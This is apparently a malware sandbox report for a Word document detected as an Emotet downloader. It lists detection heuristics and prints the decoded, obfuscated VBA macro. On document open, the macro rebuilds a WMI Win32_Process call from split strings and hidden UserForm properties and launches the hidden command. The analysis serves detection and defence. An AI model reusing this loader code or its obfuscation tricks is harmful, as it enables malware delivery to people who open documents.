MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-7458509-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7458509-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Sjjfkjzcfls = CreateObject(Rbdwrrto) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8224 bytes |
SHA-256: 103cc589812bba8725f1d32621b0b7a0c70b003d2aeb5b7f3647bb15e82003c0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
206 of 309 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Wpcelcnm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tkeunwzdjusza, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Vkfpqytfyyrsu
Dim Yybnowzai
For Sjfskvhxnyrhb = Csdnbnzqmoun To 0
Wfmshbyurpprl = xPI
Jwsugkzgnwkwn = CDbl(3)
Qacpaunqp = Tan(MyeW5A)
Ondvdvurouoh = 4 - Wyzwxelkjyp
Cbwfcynvldrtp = (3 - Vnbtyadvousr)
Eegnysps = Iqtkvhchcp
Wvqwyghlkherh = CDbl(6)
Fqjgdypkih = Tan(Hrkpsphikxbui)
Next
Dim Epygvdyqpas
Dim Viklcxhl
For Fquwlfizdcy = Csdnbnzqmoun To 0
Lvmvamrvwabr = xPI
Hynceiatpbhn = CDbl(3)
Bpzcxnzqq = Tan(MyeW5A)
Yetiqsebm = 4 - Patpurfk
Bkthbzuwtqi = (3 - Gdhlzjclzfaz)
Ithkfntxuz = Tkesksdfnlm
Bmbcesicq = CDbl(6)
Mgczbijh = Tan(Prhhvivtuw)
Next
Dim Bntqswtftvfud
Dim Nndktfjbfq
For Vzovyivelg = Csdnbnzqmoun To 0
Jkbpjpgo = xPI
Dtbvfsslna = CDbl(3)
Ygfzgmiozg = Tan(MyeW5A)
Bjdtspkkwlvut = 4 - Dlzsplwm
Jiugyjwuct = (3 - Ytxpipmklgd)
Daniofxik = Qexczzrjh
Fuacgakydfk = CDbl(6)
Jimnoyfolqzes = Tan(Lotcpqvsil)
Next
Sjjfkjzcfls
End Sub
Attribute VB_Name = "Xrfpydxbfk"
Attribute VB_Base = "0{E8D6A6C6-2BAF-4D05-B16A-00A79C17EEA2}{A3253E34-5D61-4D49-B0EB-C485ED4777B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ueqdsoufggvs"
Function Elbvfewbxtip()
Dim Yzdqenohomavo
Dim Iepyxmulumis
For Vmzarkiv = Csdnbnzqmoun To 0
Chihsaonym = xPI
Zqkjenjdvuce = CDbl(3)
Bvxvmmwc = Tan(MyeW5A)
Ensuyvuajdm = 4 - Hgumfqhfens
Qcahvxuueruo = (3 - Abupnrep)
Zrlojazaveer = Ipovcpzy
Hdjyfgoanih = CDbl(6)
Gkesutavic = Tan(Xdjnzsbqv)
Next
Otuzexnwdaa = Wpcelcnm.Tkeunwzdjusza
Dim Ojhymdixps
Dim Gnuzzpljoe
For Cvjxaxnniyya = Csdnbnzqmoun To 0
Cwgszqfzzrfq = xPI
Fjyjypwru = CDbl(3)
Semeiotwhmodv = Tan(MyeW5A)
Mcvsrjtjiyzo = 4 - Vlcuvhmsvqc
Wrqgcedcuvbt = (3 - Vefjaqilblizy)
Gepfowrrswkz = Paahiroq
Vmlqfxcg = CDbl(6)
Orlozcdnmm = Tan(Xklkhspqfqw)
Next
Fbkkbllyh = Otuzexnwdaa + Xrfpydxbfk.Xqydzwclglloa + Xrfpydxbfk.Auittfls + Xrfpydxbfk.Tbqpogqafxre
Dim Yuagbzltvajh
Dim Mizowiiepx
For Eaxdnthdtkig = Csdnbnzqmoun To 0
Dkvfcheqzvadx = xPI
Tfcliulwrn = CDbl(3)
Cqczsqxf = Tan(MyeW5A)
Junoobcdjv = 4 - Zeguoeroesmh
Wvhnzolkwixug = (3 - Oduniqxtybto)
Qhgmoegww = Ioixwuyhuposu
Ybjlgadgfa = CDbl(6)
Rfnsgzozc = Tan(Bhvgnobpmtfgf)
Next
Wohzgfledt = Fbkkbllyh + Xrfpydxbfk.Scueqyzrze + Xrfpydxbfk.Dakwruximp
Dim Ixpjzknxpm
Dim Zohlddmlvy
For Gzgosznz = Csdnbnzqmoun To 0
Yfphqoydhiaq = xPI
Bdwikvqkeocae = CDbl(3)
Pzdrfqbww = Tan(MyeW5A)
Mrqlapghnoceo = 4 - Nbaeqkzy
Xzmizhavmj = (3 - Sontwmrnupvc)
Vrwnntyccquzn = Icmetimr
Mgenidkfami = CDbl(6)
Vfvqlwzwzkklm = Tan(Jqjazzamtounj)
Next
Elbvfewbxtip = Aqtjfpyvasena + Wohzgfledt + Aqtjfpyvasena
Dim Xrhcbprq
Dim Jyfsevqpi
For Utljxmnqhmqx = Csdnbnzqmoun To 0
Noeuarvois = xPI
Hhhyvdtjdxwse = CDbl(3)
Alssbwgqg = Tan(MyeW5A)
Iiyfktbzffij = 4 - Dzipslqxmud
Gbaqblbvlkxmc = (3 - Xzrbbfxwx)
Adkwdcutuyf = Xqrspldqu
Mcboujecpnlxk = CDbl(6)
Usjwgslke = Tan(Ehmyxgsljab)
Next
End Function
Function Sjjfkjzcfls()
Dim Xxpjresegnje
Dim Uxptvvnt
For Srdvqcclwlbfi = Csdnbnzqmoun To 0
Izmhowfbb = xPI
Phavidrrrzbxo = CDbl(3)
Xinbppbnnw = Tan(MyeW5A)
Qbmqcqsmvl = 4 - Yorwfhcx
Zxnzpiot = (3 - Hrapeizgvrpli)
Byehgudi = Pdcakybz
Gnbrxhvcmonp = CDbl(6)
Ojjmgeejnnpfx = Tan(Somgownxmk)
Next
Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
Dim Bmcmitvtkrlw
Dim Jwklhskoevv
For Pdlwftscylfe = Csdnbnzqmoun To 0
Tzsdrpfljgqaf = xPI
Hhqbyfpyufc = CDbl(3)
Kkegovqols = Tan(MyeW5A)
Qdtfgenkoreo = 4 - Qdayxoltazbj
Rzvpmiibwt = (3 - Otwtgqcu)
Nnuphwcudw = Tpwpcvmo
Kwarxhslg = CDbl(6)
Emhuxblzb = Tan(Hkzhwrnhiqf)
Next
Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
Dim Cdolanzswn
Dim Etxcjnatizy
For Vpsupawpw = Csdnbnzqmoun To 0
Fftxremlpsirj = xPI
Vcnddfdfex = CDbl(3)
Hmkzimaxeuccd = Tan(MyeW5A)
Vnnxidffub = 4 - Rcaoakge
Szfjtebzl = (3 - Shrrayubgqx)
Iuefcrxhnq = Szjaduqtmzv
Zmmdsovkwazav = CDbl(6)
Cjeqwdhykacw = Tan(Wjyvicfkevczc)
Next
Jlpbkzpfo = Moplwywfs + Xrfpydxbfk.Gvdfelhh.ControlTipText + Xrfpydxbfk.Ojywqtmxik.ControlTipText
Dim Wicddkmosr
Dim Wcgtdauxechzl
For Gpdabytlpw = Csdnbnzqmoun To 0
Ffrwkyvxzbn = xPI
Azeubcrmz = CDbl(3)
Oqcbcrqxwmpsm = Tan(MyeW5A)
Bqtlebetazpro = 4 - Cfzshtvuvhl
Vlhsoebb = (3 - Bxkwcbmacdg)
Stycgwydtl = Osxdjsojqyvxx
Ihimvlboypbv = CDbl(6)
Kiliyojpxsls = Tan(Tyafneqwkyfm)
Next
Rbdwrrto = Jlpbkzpfo + Wpcelcnm.Tkeunwzdjusza
Dim Zefdcpajxyr
Dim Yzawjryueuwkq
For Dipnuwqeg = Csdnbnzqmoun To 0
Hndfcjpfpuy = xPI
Tfuujismg = CDbl(3)
Oidrcivui = Tan(MyeW5A)
Lrzrmvkume = 4 - Uobvuxvea
Qtgycgzeqpjud = (3 - Wwblfbfbjcam)
Mojqtixgxhnna = Ltyacazcpovl
Vbuyhdazejnup = CDbl(6)
Ysbljyicmywn = Tan(Bywfkbftosqs)
Next
Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
Dim Bxgutsihtr
Dim Mggkcyfliros
For Cvucehyu = Csdnbnzqmoun To 0
Wcyntnsaljf = xPI
Bgkuqbjiod = CDbl(3)
Mmrnswsbqna = Tan(MyeW5A)
Rvznghyyjtvt = 4 - Svghzjxha
Tnmcwngkczf = (3 - Ivqqdtwteozg)
Aqujuyant = Ngojlimklzdtg
Etoymwmhf = CDbl(6)
Plluubeuq = Tan(Ktgmvxgxw)
Next
Sjjfkjzcfls.XSize = False
Dim Oehznrqrd
Dim Qefwcpzeedg
For Rawltocj = Csdnbnzqmoun To 0
Ktezmztraqntq = xPI
Vpwjzchrfhmu = CDbl(3)
Pphqivdyqnekl = Tan(MyeW5A)
Oxjrsxyfzztcc = 4 - Zfptkbgdijqx
Foqbtqkddm = (3 - Jhqosbzynzv)
Viuahcaywukcb = Gwbcstsym
Oxawftyfyiq = CDbl(6)
Kasmnflrsrsry = Tan(Ccjhgqnd)
Next
Sjjfkjzcfls.YSize = False
Dim Aybgwpgadsr
Dim Bvsszuhn
For Liymejjnt = Csdnbnzqmoun To 0
Spxbbjnudav = xPI
Cruohsqbgtqxy = CDbl(3)
Qufxbkjg = Tan(MyeW5A)
Ylutrepmykn = 4 - Fadomvhdchld
Xuotlzxihwip = (3 - Lzrpbazw)
Wknmweipijrrk = Owwthgxg
Cpwcivbwswam = CDbl(6)
Cnsgfiupzn = Tan(Cdqpzdgu)
Next
Do While Vbgbcjlczlvy.Create(Null & Elbvfewbxtip, Xhghpojzzvolx, Sjjfkjzcfls, Xvfdlnnoqsfoz)
Loop
Dim Pmwfnzljaouwt
Dim Xgntzlhginv
For Eszqdyqlgs = Csdnbnzqmoun To 0
Heojjacglucvr = xPI
Igorszbfio = CDbl(3)
Uueqnhwrgswz = Tan(MyeW5A)
Uyjqeywlifsb = 4 - Fyguehhlgdonv
Pjoezfdws = (3 - Vjmzymuzm)
Cufkirfbqd = Svdxosbco
Lyzhfctvcydhu = CDbl(6)
Wmqqtbndtdu = Tan(Glfxsvumj)
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.